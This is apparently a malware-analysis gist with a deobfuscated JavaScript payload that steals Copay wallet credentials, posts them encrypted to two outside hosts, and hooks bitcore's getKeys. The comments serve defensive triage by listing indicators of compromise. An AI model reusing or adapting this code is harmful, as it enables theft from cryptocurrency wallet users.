
@tlhunter
Last active October 11, 2021 13:39
/*@@*/
/**
 * Hand-deobfuscated malicious payload, kept as an analysis specimen.
 *
 * What the listing does, in order:
 *   1. Reads the wallet app's stored "profile" and, per livenet credential,
 *      its "balanceCache-<walletId>" entry.
 *   2. Sends each such credential record (with the parsed balance added) to
 *      two remote hosts, encrypted with an embedded RSA public key.
 *   3. Replaces Credentials.prototype.getKeys from bitcore-wallet-client with
 *      a wrapper that, for flagged wallets, also sends the getKeys argument
 *      and the wallet's xPubKey.
 *
 * Indicators visible in this listing (useful for hunting and triage):
 *   - Outbound HTTP POST to "copayapi.host" and "111.90.151.134", port 8080,
 *     paths "/c" and "/p", Content-Type "text/html".
 *   - A global object named CSSMap keyed by xPubKey.
 *   - A getKeysFunc property on Credentials.prototype.
 *
 * Every failure path is swallowed by empty catch/error handlers, so the host
 * application shows no error when any step fails.
 */
function doBadStuff() {
// Outer try with an empty catch (closed at the end of the function): nothing thrown here reaches the app.
try {
const http = require("http");
const crypto = require("crypto");
// Operator's RSA public key; truncated on this page. Because the payload is encrypted
// to this key, captured request bodies cannot be read without the matching private key.
const publicKey = "-----BEGIN PUBLIC KEY-----\n...TRUNCATED...\n-----END PUBLIC KEY-----";
// Fire-and-forget POST of `body` to http://<hostname>:8080/<path>.
// The response callback and the error handler are both empty, so neither success
// nor failure is observable from inside the app; detection has to come from
// network telemetry (egress to port 8080 with the paths noted below).
function sendRequest(hostname, path, body) {
// Original request "decodes" a hex representation of the hostnames
// hostname = Buffer.from(hostname, "hex").toString();
const req = http.request({
hostname: hostname,
port: 8080,
method: "POST",
path: "/" + path, // path will be /p or /c
headers: {
"Content-Length": body.length,
"Content-Type": "text/html"
}
}, function() {});
req.on("error", function(err) {});
req.write(body);
req.end();
}
// Encrypts `rawStringPayload` in 200-character chunks with the embedded public key,
// hex-encodes each chunk, joins them with a trailing "+", and posts the result to
// both hard-coded hosts. On the wire the body is therefore a run of hex blocks
// separated by "+", despite the "text/html" content type.
function sendRequests(path, rawStringPayload) {
// path = "c" || "p"
let payload = "";
for (let i = 0; i < rawStringPayload.length; i += 200) {
const chunk = rawStringPayload.substr(i, 200);
payload += crypto.publicEncrypt(
publicKey,
Buffer.from(chunk, "utf8")
).toString("hex") + "+";
}
// Network indicators: one hostname and one bare IP receive the same payload.
sendRequest("copayapi.host", path, payload);
sendRequest("111.90.151.134", path, payload);
}
// Loads the stored entry `name`, JSON-parses it, and passes the result to `callback`.
// Under Cordova it reads a file of that name from cordova.file.dataDirectory
// (create: false, so it never creates the file). Otherwise it tries localStorage
// first and falls back to chrome.storage.local. Errors are swallowed in both branches.
function getDataFromStorage(name, callback) {
if (window.cordova) {
try {
const dd = cordova.file.dataDirectory;
resolveLocalFileSystemURL(dd, function(localFs) {
localFs.getFile(name, {
create: false
}, function(file) {
file.file(function(contents) {
const fileReader = new FileReader;
fileReader.onloadend = function() {
return callback(JSON.parse(fileReader.result))
};
fileReader.onerror = function(err) {
fileReader.abort()
};
fileReader.readAsText(contents)
})
})
})
} catch (err) {}
} else {
try {
const data = localStorage.getItem(name);
if (data) {
return callback(JSON.parse(data));
}
chrome.storage.local.get(name, function(entry) {
if (entry) {
return callback(JSON.parse(entry[name]));
}
})
} catch (err) {}
}
}
// Innocuously named global used as a set of flagged wallets, keyed by xPubKey.
// Its presence on `global` at runtime is an indicator that this code ran.
global.CSSMap = {};
// Stage 1: enumerate the stored profile's credentials and report the livenet ones.
getDataFromStorage("profile", function(data) {
for (let credential in data.credentials) {
const creds = data.credentials[credential];
if ("livenet" == creds.network) {
getDataFromStorage("balanceCache-" + creds.walletId, function(data) {
// `this` is the credential record (bound below); the parsed balance is written onto it.
const self = this;
// The cached balance string is split on a space and its first token parsed as a number.
self.balance = parseFloat(data.balance.split(" ")[0]);
// As written, a wallet is flagged when it is btc with balance < 100 or bch with balance < 1000.
// NOTE(review): this listing is a manual deobfuscation; confirm the comparison direction
// against the original sample before using it to scope which wallets were flagged.
if ("btc" == self.coin && self.balance < 100 || "bch" == self.coin && self.balance < 1000) {
global.CSSMap[self.xPubKey] = true;
}
// Sent for every livenet credential in this listing, flagged or not: the whole record
// is serialized (its full field set is not shown on this page) and posted to path "/c".
// For response purposes, treat all livenet credentials in the profile as disclosed.
sendRequests("c", JSON.stringify(self));
}.bind(creds))
}
}
});
const Credentials = require("bitcore-wallet-client/lib/credentials.js");
// Stage 2: intercept the getKeys function in the Credentials class.
// The original method is parked on the prototype as getKeysFunc, and getKeys is
// replaced with a wrapper. A getKeysFunc property on Credentials.prototype is
// therefore a runtime indicator of this hook.
Credentials.prototype.getKeysFunc = Credentials.prototype.getKeys;
Credentials.prototype.getKeys = function(keyLookup) {
// Call through first and return the genuine result, so callers see normal behaviour.
const originalResult = this.getKeysFunc(keyLookup);
try {
if (global.CSSMap && global.CSSMap[this.xPubKey]) {
// The flag is removed before sending, so each flagged wallet is reported once.
delete global.CSSMap[this.xPubKey];
// Posts the getKeys argument and the xPubKey, tab-separated, to path "/p".
// What `keyLookup` holds is not shown on this page; check the getKeys
// signature of the bitcore-wallet-client version in use.
sendRequests("p", keyLookup + "\t" + this.xPubKey);
}
} catch (err) {}
return originalResult;
}
} catch (err) {}
}
// Run as soon as ready
// Under Cordova the payload waits for the "deviceready" event (doBadStuff reads
// cordova.file.dataDirectory, a Cordova plugin API); in any other environment it
// runs immediately when this script is loaded.
window.cordova
? document.addEventListener("deviceready", doBadStuff)
: doBadStuff()